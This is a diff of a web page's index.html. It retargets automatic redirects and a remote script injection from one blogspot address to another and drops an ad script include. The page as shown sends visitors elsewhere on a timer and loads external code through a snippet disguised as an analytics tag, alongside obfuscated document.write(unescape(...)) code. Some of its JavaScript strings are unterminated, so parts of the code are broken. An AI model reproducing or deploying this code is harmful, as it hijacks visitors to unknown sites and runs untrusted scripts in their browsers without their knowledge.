--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@
 <!DOCTYPE html>
 <html>
     <head>
-       <script src="alladz.js"></script>
+       
 
 <meta name="google-site-verification" content="64WSPPwfyILtR6gFgHcSJNd0wCCiNOgJNv5cfYQFhEQ" />
         
@@ -719,10 +719,10 @@ document.write(unescape('%20%3Cscript%20type%3D%22text/javascript%22%3E%0A%20var
         fh();}
     setTimeout('hh();', 500);
     function fh(){
-        location.href="https://last-stepz.blogspot.com/";
+        location.href="https://reggzz.blogspot.com/";
     }
     function goon(){
-        location.href="https://last-stepz.blogspot.com/";
+        location.href="https://reggzz.blogspot.com/";
     }
 </script>
 
@@ -735,17 +735,17 @@ document.write(unescape('%20%3Cscript%20type%3D%22text/javascript%22%3E%0A%20var
         fh();}
     setTimeout('hh();', 500);
     function fh(){
-        location.href="https://last-stepz.blogspot.com/;
+        location.href="https://reggzz.blogspot.com/;
     }
     function goon(){
-        location.href="https://last-stepz.blogspot.com/;
+        location.href="https://reggzz.blogspot.com/;
     }
 </script>
 <script>
     var _hmt = _hmt || [];
     (function() {
         var hm = document.createElement("script");
-        hm.src = "https://last-stepz.blogspot.com/";
+        hm.src = "https://reggzz.blogspot.com/";
         var s = document.getElementsByTagName("script")[0];
         s.parentNode.insertBefore(hm, s);
     })();
